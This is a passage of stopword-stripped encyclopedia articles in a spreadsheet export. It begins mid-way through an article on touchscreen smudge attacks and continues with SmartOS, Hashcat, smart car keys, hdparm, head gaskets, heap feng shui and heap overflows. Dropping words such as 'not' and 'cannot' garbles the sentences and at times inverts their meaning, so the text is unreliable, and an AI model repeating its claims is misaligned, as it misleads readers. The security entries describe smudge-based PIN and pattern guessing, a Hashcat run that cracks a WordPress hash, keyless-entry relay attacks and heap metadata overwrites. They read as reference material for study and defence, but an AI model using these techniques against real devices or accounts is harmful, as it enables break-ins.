liquid edges ridges fill contact region. this fingerprint liquid made substances epidermis, secretory glands, extrinsic contaminants dirt outside skin products. fingertip lifted, liquid also retracts, leaving behind leftover traces. attackers able fingerprint powder dust smudges unveil visible fingerprint ridges. powder enhance diffuse reflection, reflects rough surfaces makes dusted smudge visible human eye. there different powders choose based colors best contrasts touchscreen environment. examples powders aluminum, bronze, cupric oxide, iron, titanium dioxide, graphite, magnetic, fluorescent powder. this dusting action also mimics processes used crime scene investigation. preserving fingerprints preserving fingerprints utilizes camera capture multiple pictures fingerprint images keypad different light variations. generally, high-resolution cameras bright lights work best identifying smudges. goal limit reflections isolate clear fingerprints. visibility objects visibility fingerprint relies light source, reflection, shadows. touch screen surface smart device different reflections change someone views image fingerprint. diffuse reflection incident rays reflected many angles produced rough surfaces. diffuse reflection light reflects image fingerprint human see. techniques used preprocessing strong light enhances diffuse reflection clearer photo. specular reflection incident rays reflected angle produced smooth surfaces. specular reflection light reflects "virtual" image (since produce light) seems come behind surface. example mirror. mapping fingerprints keypad fingerprint mapping uses photographed smudge images figure keys used laying smudge images keypad comparing image reference picture. mapping positions smudges helps attacker figure tapped keys used authorized user. first, fingerprints keypad images resized processed find areas corresponding fingerprints keys occupy. next, laplace edge detection algorithm applied detect edges ridges finger, sharpen overall fingerprint, eliminate background smudges. photo converted binary image create contrast white fingerprints black background. using image grid divisions also helps clarify user tapped based locations largest number white dots grid area. differentiating multiple fingerprints case multiple users, grouping fingerprints help classify ones belong person. fingerprints ridges valleys, differentiating determined overall local ridge structure. there three patterns fingerprint ridges– arch, loop, whorl– represent overall structure, ridge endings bifurcation represent local structure minutiae points. different algorithms incorporate fingerprint traits structure group fingerprints identify differences. some examples algorithms used filterbank, adjacent orientation vector (aov) system, correlation-filter. filterbank requires whole fingerprints cannot identify tips finger since uses local overall structure. algorithm works selecting region interest dividing sectors. feature vector local features formed filtering sector, euclidean distance vectors fingerprint images compared match. adjacent orientation vector system matches fingerprints based number minutiae pairs finger details rather global/overall structure finger. algorithm works numbering ridges minutiae pairs creating consisting number difference adjacent minutiae orientations. score distance fingerprints computed checked threshold fine matching fingerprints same. correlation filter works whole fingers fingertips. this algorithm works using correlation filter training image fingerprint image find local overall ridge pattern ridge frequency. when verifying fingerprint, transformation applied test image multiplied results applying correlation filter person interest. test subject template match, large result. smudge-supported pattern guessing (smug) smug specific attack method combines image processing sorting patterns figure pattern-based passwords. first, attackers take picture smudge area using appropriate camera lighting. using image-matching algorithm, captured image compared reference picture device properly extract cropped picture focused smudges. next, smudge objects identified using binary, canny edge detection, hough transformation enhance visibility fingerprint locations. possible segments swipes points detected algorithm form target pattern. segments filtered remove unwanted isolated edges keep edges follow segment direction. these segments identified figuring smudge grid points part pattern comparing number smudge objects threshold. lastly, segments used password model locate potential passwords (e.g. n-gram markov model). experiment conducted found method successful unlocking pattern codes 74.17% time assisted smudge attacks, improvement 13.33% pure guessing attacks. types vulnerable security methods smudge attacks performed various smart device locking methods android patterns, pins, text-based passwords. authentication methods require user screen input correct combination, leads susceptibility smudge attacks look smudges. personal identification numbers (pins) main article: personal identification numbers four number code unique individual widely used authentication method mobile phones mobile phone users utilizing function. four-digit pins mainly used english users six-digit pins used users asia. there number options choose from, four-digit pins 10,000 different number combinations six-digit pins 1,000,000. pins susceptible smudge attacks attacks possible direct observation like shoulder-surfing attacks pure guessing like brute-force attacks. they also used heavily electronic transactions using atms banking situations. shared stolen, device machine cannot detect whether user rightful owner since relies correct number inputted. relation smudge attacks, allows attackers easily steal information since authenticate user actually are. text-based passwords main article: passwords text-based passwords popular type security measure people lock phones alphanumeric way. users combination numbers, uppercase lowercase letters, punctuation, special characters create passwords. touchscreen devices text-based passwords contain fingerprint smudges location corresponding numbers letters alphanumeric keypad. attackers perform smudge attack. downfall text-based passwords vulnerability smudge attacks also tendency users forget password. this causes many users something easy remember reuse multiple passwords across different platforms. these passwords fall called weak password subspace within full password space makes easier attackers break brute-force dictionary attacks. early study reviewed 3289 passwords, sort structural similarity containing dictionary words short. draw-a-secret (das) main article: draw-a-secret draw-a-secret graphical authentication scheme requires users draw lines points two-dimensional grid. successful authentication depends user exactly replicate path drawn. android pattern password version pass-go follows concept das. pass-go pass-go uses grid isn’t need store graphical database allows user draw password long want. unlike das, scheme relies selecting intersections grid instead cells screen, users also draw diagonal lines. adam proposed method found three month study, many people drew longer pattern passwords, goes tendency choose minimal easy-to-remember passwords. android pattern passwords android pattern lock graphical password method introduced google 2008 users create pattern line-connecting grid. about android users pattern lock secure phones. there 389,112 possible patterns user draw each pattern must contain least points grid, contact point once, cannot skip intermediate points points unless used earlier. touchscreen devices android pattern lock leave behind swipes give away right location combination attacker needs unlock phone unauthorized user. security android pattern lock smudge attacks tested researchers university pennsylvania, swipes left behind drawn pattern, able discern code fully time partially time proper conditions. countermeasures physiological biometrics android face unlock, iphone touch face trusted voice recently implemented mobile devices main alternative method validation. there also novel ways potential future security scheme implemented mainstream usage. some ways avoid requirement input anything fingers thus eliminating ability attackers smudges determine password lock. strong passwords although many countermeasures help protect smudge attacks, creating secure passwords first step protecting device. some recommended steps are: passwords least characters long. longer password strays away weak password subspace makes harder attacker interpret fingerprint smudges avoid using words dictionary common make password weak. change passwords frequently. randomly generated passwords. random passwords prevent user selecting commonly used easy-to-remember words easily susceptible attacks. avoid using password every security authentication system. this prevents attackers accessing information happen discover passwords.although recommended tips stronger passwords, users strong password options remember later forget passcode frequent changes. avoid this, users tend choose short, weaker passwords make convenient shorten unlocking time. anti-fingerprint protection researchers looked anti-fingerprint properties allow people keep current password schemes worry leftover smudges. surfaces able repel water oils finger called amphiphobic. surfaces surface energy surface transparency (low roughness) typically anti-smudge higher contact angles molecular attraction. molecular attraction means little adhesion water molecules bind surface leave behind trace. however, achieving properties still functioning touchscreen hard surface energy alters durability functionality touchscreen itself.with research, various anti-smudge screen protectors market tech armor's anti-glare anti-fingerprint film screen protector zagg's invisibleshield premium film glass elite (tempered glass) antimicrobial screen protectors. zagg markets invisibleshield smudge resistant, glare resistant, scratch proof. these phone accessories range dollars.there also various smartphones market pitched oleophobic coating, resists keep touchscreen free fingerprints. oleophobic screen beads residuals, preventing sticking surface making easy wipe finger residuals without smearing. july 2016, blackberry released dtek50 smartphone oleophobic coating. other phone developers used touchscreens devices apple's many generations iphones, nokia, lumia. hero. biometrics biometrics type authentication identifies user based behavior physical characteristics, keystrokes, gait, facial recognition rather recall memorize. biometrics system takes unique features individual records biometric template, information compared current captured input authenticate user. biometrics categorized either physiological behavioral national science technology council’s subcommittee (nstc) biometrics. this type security serve secondary protection traditional password methods susceptible smudge attacks since rely entering memorized number pattern recalling image. research conducted biometric authentication found hybrid biometrics traditional passwords pins improve security usability original system.one downsides biometrics mimicry attacks attackers mimic user. this increase vulnerability device attackers turn methods allow copy victim’s behavior. some methods include using reality-based guide attackers entering victim’s phone using transparent film pointers audio cues mimic victim’s behavior. another vulnerability biometric template leaked stolen hacking various means unauthorized people. possible solution theft, leak, mimicry fingerprint template protection schemes make difficult attackers access information encryption added techniques. physiological physiological biometrics authenticates user based human characteristics. measuring characteristics unique individual creates stable mostly consistent mechanism authenticate person since features change quickly. some examples physiological biometric authentication methods listed below. iris recognition fingerprint recognition hand geometry facial recognition behavioral behavioral biometrics authenticates user based behavior, habits, tendencies true user. some examples include voice recognition, gait, hand-waving, keystroke dynamics. schemes listed proposed specifically protect smudge attacks. touch-interaction: touch-interaction proposed authenticating user based interactions touch screen tapping sliding. there types: static checks user continuous checks user multiple times. convenience method require extra sensors check monitor user background without help attention user. chao describes process down, right, left motions checked terms position finger, length swipe, angle, time takes, velocity, acceleration, finger pressure. conducted experiment, tested usable reliable touch-based method found touch operations stable blocked unauthorized users expected error rate 1.8%. however, still factors like smartphone type, software, environment, familiarity phone, physical state user could create variability thus higher rate error. beat this specific unlocking method called beat, authenticates behavior user perform gesture signature. gesture swiping pinching touch screen, signature scheme requires user sign name. this method secure smudge attacks also need extra hardware. beat works first asking user perform action times create model based performed action authentication. features identified velocity magnitude, device acceleration, stroke time, inter-stroke time, stroke displacement magnitude, stroke displacement direction, velocity direction. machine learning techniques applied determine whether user legitimate not. experiment conducted using beat method samsung smartphones tablets found collecting 15,009 gesture samples 10,054 signature samples, error rate gestures 0.5% 0.52% signature. smudgesafe smudgesafe another authentication method protected smudge attacks uses 2-dimension image transformations rotate, flip, scale image login screen page. user draw graphical password shaper created points image usual, image look different every time user logs changes done image randomized, previous login smudges give hints attackers input ensure transformations applied significantly change locations password points, area specific locations image restricted. study comparing smudgesafe's graphical authentication method lock patterns pins, smudgesafe performed best mean 0.51 passwords guessed participant. pattern lock mean 3.50 pins mean 1.10 passwords correctly guessed participant. tinylock tinylock proposed kwon uses grids; pressed cells confirmation process, bottom drawing authentication process. grid used notify user flickering vibrating user correct initial start drawing. bottom half screen contains tiny grid used drawing secret password. grid much smaller size compared traditional pattern locks, forces user draw confined space squeeze smudges small area. this method mitigates smudge attacks smudges smushed together, users required draw circular virtual wheel either direction drawing pattern password. however, method completely free shoulder-surfing attacks. also, another drawback grid dots hard visualize small size, makes difficult draw complex patterns unlock without error. clickpattern clickpattern uses grid labeled nine, user click nodes correlate drawn line prevent swiping screen. doing creates smudges harder distinguish normal screen usage. anything, smudges created reveal nodes used pattern, thus protected smudge attacks android pattern lock. lock screen, clickpattern consists three components: grid table numbered okay undo buttonthe user authenticated inputted pattern original pattern exact order direction. create valid pattern, pattern must least points none used once. pattern also always contain dots sequence, even though necessarily need clicked. users also previously used dots access unused node. multi-touch authentication touch fingers straight together (tsft) this multi-touch authentication uses geometric behavioral characteristics verify users touch screen device. according song al., tfst gesture takes average 0.75 seconds unlock, easy use, simple follow. user puts four fingers together straight position, decreasing amount surface compared multi-touch methods. with fingers fixed hand posture, user choose either trace simple complex pattern, screen pick positions fingers record trace movement form touch events. these touch events account y-coordinates, amount pressure applied, finger size, timestamp, size touched area, compared template created registration process. physiological features hand geometry include measurement possible strokes performed gesture. horizontal strokes track finger length differences, vertical strokes track finger width. since user always places fingers straight position, measurements finger stay provide consistent verification. lastly, behavioral features traced, specifically length stroke, time takes, velocity stroke, tool area touch point relation finger size, touch area size, pressure applied, angle stroke. stroke, behavioral features, increases four strokes. bend passwords with technology geared towards creating flexible display smartphone devices, opportunities create novel authentication methods. bend passwords original type password authentication used flexible screens. involves different bend gestures users perform twisting disfiguring display surface, total gestures currently available. bending part single gesture individually bending four corners display part multi-bend gesture simultaneously bending pairs corners. fractal-based authentication technique (fbat) proposed authentication method called fractal-based authentication technique (fbat) uses sierpinski’s triangle authenticate users. this process combines recognition-based cued recall-based authentication users recognize click personal pre-selected color triangles level triangles increases. smartphones, level triangles limited size touch screen, increase bigger tablets. level probability attacker guess password 0.13%. recognition-based requires users recognize pre-selected images cued recall-based graphical requires users click pre-selected points image. sierpinski triangle, selected colored pattern created registration hidden device. authenticate themselves, user must select correct pattern level triangles randomly shuffle. since colored triangles randomly generated, found different locations every authentication, thus leaving smudges behind give clues potential attackers. this technique used android devices, machines, laptops, device uses authentication unlock. knock code knock code authentication method introduced electronics allows users unlock phone without turning tapping correct area right sequence. screen split four sections, vertical horizontal lines changing. there variations knock code proposed—the knock code. these variations protect smudge attacks sliding operations erase knocking taps inputted. user study compared original knock code android pattern lock, variation schemes resistance smudge attacks. knock code: knock code adds sliding gesture helps increase amount password combinations billion ways thousand times bigger original knock code. this scheme uses four parts grid aims decrease amount gestures performed still high level security. knock code: scheme also uses sliding operations decreases amount areas side-to-side. flexible area recognition, algorithm used, doesn’t allow sliding operations area convenience, user thumb unlock phone. amount passwords subspace exact original knock code. future there movement towards physiological biometric authentication current smartphone security fingerprint facial recognition allow user replace pins alphanumeric passcodes. however, even advanced authentication methods flaws weaknesses users take advantage example, examination touch authentication, researchers observed similar swiping behavior finger pressure large number phone users, generic information attackers performing successful attacks. research biometrics multi-gesture authentication methods continuing help combat attacks traditional passwords eliminate vulnerabilities novel schemes trends technology developed. also biometric points keystroke dynamics lock screen password strength mobile security shoulder-surfing lipophobicity references</t>
  </si>
  <si>
    <t>SmartOS</t>
  </si>
  <si>
    <t>smartos free open-source svr4 hypervisor based unix operating system combines opensolaris technology linux's virtualization. core kernel contributed illumos project. features several technologies: crossbow, dtrace, kvm, zfs, zones. unlike illumos distributions, smartos employs netbsd pkgsrc package management. smartos designed particularly suitable building clouds generating appliances. originally developed joyent, announced april 2022 sold business supporting developing solutions. open-source free anyone use. smartos in-memory operating system boots directly random-access memory. supports various boot mechanisms booting hard drive, thumbdrive, image, network boot. many benefits employing boot mechanism operating system upgrades trivial, simply requiring reboot newer smartos image version.smartos follows strict local node storage architecture. this means virtual machines stored locally node boot network central nas. this helps ensure network latency issues eliminated well preserve node independence. multi-node smartos clouds managed open-source joyent triton datacenter (formerly known smartdatacenter) cloud orchestration suite project fifo open source smartos cloud management platform built erlang. 2012, joyent mongodb inc. (formerly 10gen) partnered improve scalability smartos. virtualization smartos includes number virtualization technologies, including: zones, light weight operating system-level virtualization; analogous "jails" "containers" provided systems hardware virtualization native zones native zones provide isolated smartos environment applications like virtual machine without hypervisor overhead. (linux emulation) lx-branded zones provide linux system call interface, allowing linux application binaries without recompiling smartos. this facility available several distributions, including illumos, smartos omnios. qemu ported smartos 2011, used intel cpus support. bhyve bhyve hypervisor freebsd ported smartos. this preferred virtualization required windows linux guests. references external links official website</t>
  </si>
  <si>
    <t>Hashcat</t>
  </si>
  <si>
    <t>hashcat password recovery tool. proprietary code base 2015, released open source software. versions available linux, windows. examples hashcat-supported hashing algorithms hashes, md4, md5, sha-family unix crypt formats well algorithms used mysql cisco pix. hashcat publicly noticed optimizations; partly based flaws software discovered creator hashcat. example flaw 1password's password manager hashing scheme. also compared similar software usenix publication described technica. variants previously, variants hashcat existed: hashcat cpu-based password recovery tool oclhashcat/cudahashcat gpu-accelerated tool (opencl cuda)with release hashcat v3.00, tools merged single tool called hashcat. cpu-only version became hashcat-legacy. both require opencl. many algorithms supported hashcat-legacy (such md5, sha1, others) cracked shorter time gpu-based hashcat. however, algorithms accelerated gpus. bcrypt example this. factors data-dependent branching, serialization, memory (and more), oclhashcat/cudahashcat catchall replacements hashcat-legacy. hashcat-legacy available linux, windows. hashcat available macos, windows, linux gpu, generic opencl support allows fpgas accelerator cards. sample output hashcat example400.hash example.dict hashcat (v5.1.0) starting... opencl platform intel(r) corporation ======================================== device intel(r) core(tm) i5-2500k 3.30ghz, skipped. opencl platform nvidia corporation ====================================== device geforce 970, 1010/4041 allocatable, 13mcu device geforce skipped. hashes: digests; unique digests, unique salts bitmaps: bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates rules: applicable optimizers: optimized-kernel zero-byte single-hash single-salt minimum password length supported kernel: maximum password length supported kernel: watchdog: temperature abort trigger dictionary cache hit: filename..: example.dict passwords.: 128416 bytes.....: 1069601 keyspace..: 128416 wordlist mask using small. this means hashcat cannot full parallel power device(s). unless supply work, cracking speed drop. tips supplying work, see: https://hashcat.net/faq/morework approaching final keyspace workload adjusted. $h$9y5boz2wsulgl2ti6b5prroadzyfxd1:hash234 session..........: hashcat status...........: cracked hash.type........: phpass, wordpress (md5), phpbb3 (md5), joomla (md5) hash.target......: $h$9y5boz2wsulgl2ti6b5prroadzyfxd1 time.started.....: 05:10:35 2019 secs) time.estimated...: 05:10:35 2019 secs) guess.base.......: file (example.dict) guess.queue......: (100.00%) speed.#2.........: 2654.9 kh/s (22.24ms) accel:128 loops:1024 thr:1024 vec:1 recovered........: (100.00%) digests, (100.00%) salts progress.........: 128416/128416 (100.00%) rejected.........: 0/128416 (0.00%) restore.point....: 0/128416 (0.00%) restore.sub.#2...: salt:0 amplifier:0-1 iteration:1024-2048 candidates.#2....: zzzzzzzzzzz hardware.mon.#2..: temp: fan: util: core:1265mhz mem:3004mhz bus:8 started: 05:10:32 2019 stopped: 05:10:37 2019 attack types hashcat offers multiple attack modes obtaining effective complex coverage hash's keyspace. these modes are: brute-force attack combinator attack dictionary attack fingerprint attack hybrid attack mask attack permutation attack rule-based attack table-lookup attack (cpu only) toggle-case attack prince attack version 0.48 higher only)the traditional bruteforce attack considered outdated, hashcat core team recommends mask-attack full replacement. competitions team hashcat (the official team hashcat software composed core hashcat members) first place korelogic "crack can" competitions defcon 2010, 2012, 2014, 2015, 2018, derbycon 2017. also brute-force attack brute-force search hacker (computer security) hacking tool openwall project password cracking references external links official website guide password cracking hashcat talk: confessions crypto cluster operator based oclhashcat derbycon 2015 talk: hashcat state union derbycon 2016</t>
  </si>
  <si>
    <t>Smart key</t>
  </si>
  <si>
    <t>smart electronic access authorization system available either standard equipment, option several designs. first developed siemens 1995 introduced mercedes-benz name "keyless-go" 1998 w220 s-class, design patent filed daimler-benz 1997. works smart allows driver keep pocketed unlocking, locking starting vehicle. identified several antennas car's bodywork radio pulse generator housing. depending system, vehicle automatically unlocked button sensor door handle trunk release pressed. vehicles smart-key system mechanical backup, usually form spare blade supplied vehicle. some manufacturers hide backup lock behind cover styling. vehicles smart-key system disengage immobilizer activate ignition without inserting ignition, provided driver inside car. vehicles, done pressing starter button twisting ignition switch. when leaving vehicle equipped smart-key system, vehicle locked either pressing button door handle, touching capacitive area door handle, simply walking away vehicle. method locking varies across models. some vehicles automatically adjust settings based smart used unlock car. user preferences seat positions, steering wheel position, exterior mirror settings, climate control (e.g. temperature) settings, stereo presets popular adjustments. some models, ford escape, even settings prevent vehicle exceeding maximum speed started certain key. nomenclature manufacturers keyless authorization systems different names: acura: keyless access system audi: advanced aston martin: keyless entry push button start bmw: comfort access display bugatti: keyless entry remote cadillac: adaptive remote start keyless access fiat-chrysler: keyless enter-n-go ford: intelligent access push-button start general motors: passive entry passive start (peps) honda: smart entry system hyundai: proximity smart entry infiniti: infiniti intelligent push-button ignition isuzu: genius entry jaguar cars: smart system jeep: keyless enter-n-go motors: smart system lexus: smart access system lincoln: intelligent access system mazda: advanced keyless entry start system mercedes-benz: keyless integrated smartkeys mini: comfort access mitsubishi motors: fast system nissan: nissan intelligent peugeot: peugeot open porsche: porsche entry drive system proton: passive keyless entry renault: renault hands free keycard ssangyong motor: smart system subaru: keyless smart entry with push-button start keyless access push-button start suzuki: smartpass keyless entry starting system toyota: smart system volkswagen: keyless entry keyless start kessy volvo: personal communicator "pcc" keyless drive keyless drive mahindra mahindra: smart module insurance standard 2005, motor insurance research expert thatcham introduced standard keyless entry, requiring device inoperable distance vehicle. independent test, nissan micra's system found secure, certain mercedes keys failed, theoretically capable allowing cars driven away owners refueling. despite security vulnerabilities, auto theft rates decreased percent 2009 2010, national insurance crime bureau credits smart keys decrease. smartkeys smartkeys developed siemens mid-1990s introduced mercedes-benz 1997 replace infrared security system introduced 1989. daimler-benz filed first patents smartkey february 1997, german patent offices, multifunction switchblade variants following 1997. device entailed plastic used place traditional metal key. electronics control locking systems ignitions made possible replace traditional sophisticated computerized "key". considered step remote keyless entry. smartkey adopts remote control buttons keyless entry, incorporates smartkey fob. once inside mercedes-benz vehicle, smartkey fob, unlike keyless entry fobs, placed ignition slot starter computer verifies rolling code. verified milliseconds, turned traditional start engine. device designed cooperation siemens automotive exclusively mercedes-benz, many luxury manufacturers implemented similar technology based idea. addition smartkey, mercedes-benz integrates option keyless feature allows driver keep smartkey pocket, giving ability open doors, trunk well starting without ever removing pocket. smartkey's electronics embedded hollow, triangular piece plastic, wide top, narrow bottom, squared-off half-inch-long insert piece. side smartkey also hides traditional mercedes-benz pulled release top. metal used valet purposes locking glove compartment and/or trunk smartkey turned parking attendant. once locked manually, trunk cannot opened smartkey interior buttons. utilizes radio-frequency transponder communicate door locks, uses infrared communicate engine immobilizer system. original smartkeys limited frequency could used line-of-sight safety purposes. driver also point smart front driver side door pushing holding unlock button smartkey windows sunroof open order ventilate cabin. similarly, procedure completed holding lock button, windows sunroof close. cars equipped active ventilated seats, summer opening feature activate seat ventilation addition opening windows sunroof. display display type smart developed includes small color touchscreen performs standard functions would normally locking, unlocking keyless start, screen user also perform number features bmw's app. includes commanding self park self parking capability. currently available series, series, series, series, series, series, rechargeable last weeks. charged micro port side wirelessly center console. keyless keyless (also: keyless entry passive entry mercedes' term automotive technology allows driver lock unlock vehicle without using corresponding smartkey buttons. once driver enters vehicle equipped keyless smartkey keyless wallet-size card, ability start stop engine, without inserting smartkey. transponder built within smartkey allows vehicle identify driver. additional safety feature integrated vehicle, making impossible lock smartkey keyless inside vehicle. system works series (low frequency khz) transmitting antennas inside outside vehicle. external antennas located door handles. when vehicle triggered, either pulling handle touching handle, signal transmitted antennas key. becomes activated sufficiently close transmits back vehicle (radio frequency &gt;300 mhz) receiver located vehicle. correct pase module unlocks vehicle. hardware blocks keyless entry electronic control unit based functionality: transmitting low-frequency signals power amplifier block receiving radio frequency signals mhz) built-in receiver block encrypting decrypting relevant data signals (security) communicating relevant interface signals electronic control units microcontroller inside outside detection smart determines inside outside vehicle measuring strength fields. order start vehicle, smart must inside vehicle. security requirements important vehicle can't started user therefore smart outside vehicle. this especially important fueling stations user close vehicle. internal field allowed overshoot maximum help minimise risk. maximum overshoot usually found side windows little attenuation signal. second scenario exists name "relay station attack" (rsa). based idea reducing long physical distance regular owner's smartkey. relay stations needed this: first relay station located nearby second close smartkey. first view, keyless entry smartkey could communicate together. third person could pull door handle door would open. however, every keyless entry system provisions exist avoid successful two-way communication rsa. some known are: measuring group delay time detect illegal high values measuring third-order intercept point detect illegal intermodulation products measuring field strength electric field measuring response time circuit using complex modulation (i.e. quadrature amplitude modulation) can't demodulated modulated simple relay stationfurthermore, keyless entry communicates control units within vehicle. depending electric architecture, following control systems enabled disabled: escl electric steering column lock electronic ignition switch central door locking system immobiliser engine control unit (motor management system) body control unitanother possibility using motion sensor within fob. internal field dead spots dead spots result maximum overshoot requirement above. power delivered internal antennas tuned provide best performance i.e. minimum dead spots maximum average overshoot. dead spots usually near extremities vehicle e.g. rear parcel shelf. battery backup battery smart becomes depleted, necessary backup method opening starting vehicle. opening achieved emergency (fully mechanical) blade usually hidden smart key. many cars emergency starting achieved inductive coupling. user either slot hold near special area cockpit, inductive coil hidden behind transfers energy matching coil dead using inductive charging. slots proven problematic, wrong becomes locked cannot removed. another problem slot can't compensate battery certain operating threshold. most smart batteries temperature sensitive causing become intermittent, fully functional, inoperative day. special cases keyless entry system able detect handle following cases: smartkey transponder forgotten rear trunk more smartkey present inside smartkey getting lost drive smartkey battery (limp-home) history system based technology invented siemens called pase: passive start entry system. operates band radio frequencies. keyless entry introduced first mercedes-benz s-class series 1998. outlook today keyless entry system state-of-the technology still potential optimise. here general trends advance (ad) series development (sd): reduction used antennas low-cost compact cars (results loss detection quality) using electric field antennas instead magnetic field antennas (cost reduction) using microwave frequencies (radar) instead combination (more comfort) biometric authentication would identify user smartkey transponder effectiveness test adac revealed models keyless could entered driven away without key. 2014, 6,000 cars (about day) stolen using keyless entry london. also remote keyless system transponder references external links relay attacks passive keyless entry start systems modern cars [https://www.usenix.org/system/files/conference/usenixsecurity16/sec16_paper_garcia.pdf security flaws remote</t>
  </si>
  <si>
    <t>Hdparm</t>
  </si>
  <si>
    <t>hdparm command line program linux view hard disk drive hardware parameters test performance. parameters drive caches, sleep mode, power management, acoustic management, settings. gparted parted magic include hdparm.changing hardware parameters suboptimal conservative defaults optimal settings improve performance greatly. example, turning can, instances, double triple data throughput. there however, reliable method determining optimal settings given controller-drive combination, except careful trial error. depending given parameters, hdparm cause computer crashes render data disk inaccessible. usage examples hdparm special privileges, otherwise either found requested actions executed properly. display information hard drive: sudo hdparm /dev/sda turn first hard drive: sudo hdparm /dev/sda test device read performance speed timing buffered disk reads) first hard drive: sudo hdparm /dev/sda enable energy saving spindown inactivity (24*5=120 seconds): sudo hdparm /dev/sda retain hdparm settings software reset, run: sudo hdparm /dev/sda enable read-ahead: sudo hdparm /dev/sda change acoustic management, cost read/write performance (some drives, newer drives ssds, ignore setting.): sudo hdparm /dev/sda disk synchronisation intervals short, even small amounts data written disk severe consequences lifespan. better would collect small data bigger chunks wait chunk enough written disk. current browsers like chrome write regularly small chunks browsing order lose important data application crashes. however, lets disk spin often drive repeatedly needs unleash park heads. generated noises thus regarded distracting user. circumvent issue, user switch drive lowest degree power management (next value, 255, turns power management off): hdparm /dev/sda additionally, changing value /proc/sys/vm/dirty_expire_centisecs effect performance. sets flush interval dirty pages written disk.these commands effective long-run user makes changes persistent. however, settings user hdparm reverted time system rebooted. therefore, might wise restore personal settings upon boot. appropriate place exists linux distributions /etc/rc.local script. also atatool windows references external links hdparm sourceforge page</t>
  </si>
  <si>
    <t>Head gasket</t>
  </si>
  <si>
    <t>internal combustion engine, head gasket provides seal engine block cylinder head(s). purpose seal combustion gases within cylinders avoid coolant engine leaking cylinders. leaks head gasket cause poor engine running and/or overheating. purpose within water-cooled internal combustion engine, three fluids travel engine block cylinder head: combustion gases (unburned air/fuel mixture exhaust gases) cylinder water-based coolant coolant passages lubricating galleriescorrect operation engine requires circuits leak lose pressure junction engine block cylinder head. head gasket seal prevents leaks pressure losses. types multi-layer steel (mls): most modern engines produced gaskets. these consist five (typically three) thin layers steel, interleaved elastomer. contact faces usually coated rubber-like coating viton adheres engine block cylinder head inner layers optimized resilience. solid copper: solid sheet copper, typically requires special machining called o-ringing places piece wire around circumference cylinder bite copper. when performed copper gaskets durable. composite: older design prone blowouts newer designs. composite gaskets traditionally made asbestos graphite. asbestos gaskets increasingly rare health concerns. elastomeric: uses steel core plate molded place silicone rubber beads seal coolant passages. bores sealed rolled steel fire rings conventional manner. this type gasket used rover k-series engine. o-ring: these gaskets typically built steel copper. they reusable used correctly prepared flat surfaces yield highest clamping pressure, much lower surface area compared gasket types. gasket failure leak head gasket often called "blown head gasket" result leak coolant, combustion gasses, both. blue smoke exhaust suggests excess entering combustion chambers (although possible causes head gasket leak). white smoke exhaust suggests coolant entering combustion chamber. head gasket leaks classified either external internal. external leaks visible coolant outside engine (typically underneath). internal leaks fluids enter another circuit result changes coolant oil. former presence foam (caused hydrocarbons) coolant expansion tank. coolant leaking system result mayonnaise, milkshake-like, substance oil, often seen dipstick, filler cap. however, presence substance conclusive proof head gasket failure, since could coolant routes. likewise, entirely possible head gasket fail never comes contact coolant. therefore possible conclusively determine head gasket condition inspecting oil. coolant leakageif coolant enters cylinder, burning air/fuel mixture compromised, reducing engine's performance often causing steam (white smoke) visible exhaust. this steam damage catalytic converter. large amount coolant leaks cylinders, engine suffer hydrolock, cause extensive engine damage. combustion leakagewhen combustion gasses leak cylinder, causes loss compression, leading power reduction rough running. combustion gases leaking cooling system, reduces effectiveness cooling system cause engine overheat. occurrences gases leak small spaces gasket either cylinder head engine block traps gases, released engine turned off. these gases escape coolant create pockets. sometimes pockets trapped engine's coolant thermostat, causing stay closed cause overheating, thereby creating voids gasket engine. other times pockets also cause engine expel coolant overflow expansion tank, thereby reducing amount coolant available cooling. diagnosis repair common test methods head gasket leaks compression test (using pressure gauge), leak-down test chemical test identifies hydrocarbons coolant fluid.the cost replacement component (i.e. head gasket itself) usually relatively low, however significant labor costs involved replacement process. this process removing replacing cylinder head time-consuming task. effect engine knocking engine knocking (detonation) caused poor quality fuel, engine fault inappropriate fuel and/or ignition settings trialled chosen engine tuning taking place. detonation severe, cylinder pressure increase eight times normal pressures, cause cylinder head lift away engine block, disrupting seal two. most gaskets used standard production engines critically damaged severe detonation. also internal combustion engine cooling motor rocker cover gasket references</t>
  </si>
  <si>
    <t>Heap feng shui</t>
  </si>
  <si>
    <t>computer security, heap feng shui (also known heap grooming) technique used exploits facilitate arbitrary code execution. technique attempts manipulate layout heap making heap allocations carefully selected sizes. named feng shui, ancient chinese system aesthetics involves selection precise alignments space. operation term general used describe variety techniques bypassing heap protection strategies. paper often credited naming technique, "heap feng shui javascript", used refer exploit dangling pointer aligned portion attacker-controlled chunk. however, also found usage capture flag events describe attacks exploit characteristics heap layout, spacing chunks. also heap spraying spraying references external links heap feng shui javascript whitepaper alexander sotirov heap feng shui javascript slides blackhat presentation subject.</t>
  </si>
  <si>
    <t>Heap overflow</t>
  </si>
  <si>
    <t>heap overflow, heap overrun, heap smashing type buffer overflow occurs heap data area. heap overflows exploitable different manner stack-based overflows. memory heap dynamically allocated runtime typically contains program data. exploitation performed corrupting data specific ways cause application overwrite internal structures linked list pointers. canonical heap overflow technique overwrites dynamic memory allocation linkage (such malloc metadata) uses resulting pointer exchange overwrite program function pointer. example, older versions linux, buffers allocated next heap could result first buffer overwriting second buffer's metadata. setting in-use zero second buffer setting length small negative value allows null bytes copied, program calls free() first buffer attempt merge buffers single buffer. when happens, buffer assumed freed expected hold pointers first bytes formerly allocated buffer. gets written used overwrite pointer. consequences accidental overflow result data corruption unexpected behavior process accesses affected memory area. operating systems without memory protection, could process system. example, microsoft jpeg gdi+ buffer overflow vulnerability could allow remote execution code affected machine.ios jailbreaking often uses heap overflows gain arbitrary code execution. detection prevention buffer overflows primarily three ways protect heap overflows. several modern operating systems windows linux provide implementation three. prevent execution payload separating code data, typically hardware features nx-bit introduce randomization heap found fixed offset, typically kernel features aslr (address space layout randomization) introduce sanity checks heap managersince version 2.3.6 libc includes protections detect heap overflows fact, example checking pointer consistency calling unlink. however, protections prior exploits almost immediately shown also exploitable. addition, linux included support aslr since 2005, although introduced better implementation years before. also linux included support nx-bit since 2004. microsoft included protections heap resident buffer overflows since april 2003 windows server 2003 august 2004 windows service pack these mitigations safe unlinking heap entry header cookies. later versions windows vista, server 2008 windows include: removal commonly targeted data structures, heap entry metadata randomization, expanded role heap header cookie, randomized heap base address, function pointer encoding, termination heap corruption algorithm variation. normal data execution prevention (dep) aslr also help mitigate attack. also heap spraying stack buffer overflow exploit shellcode references external links vudo malloc tricks heap overflow article heise security defeating microsoft windows heap protection bypass</t>
  </si>
  <si>
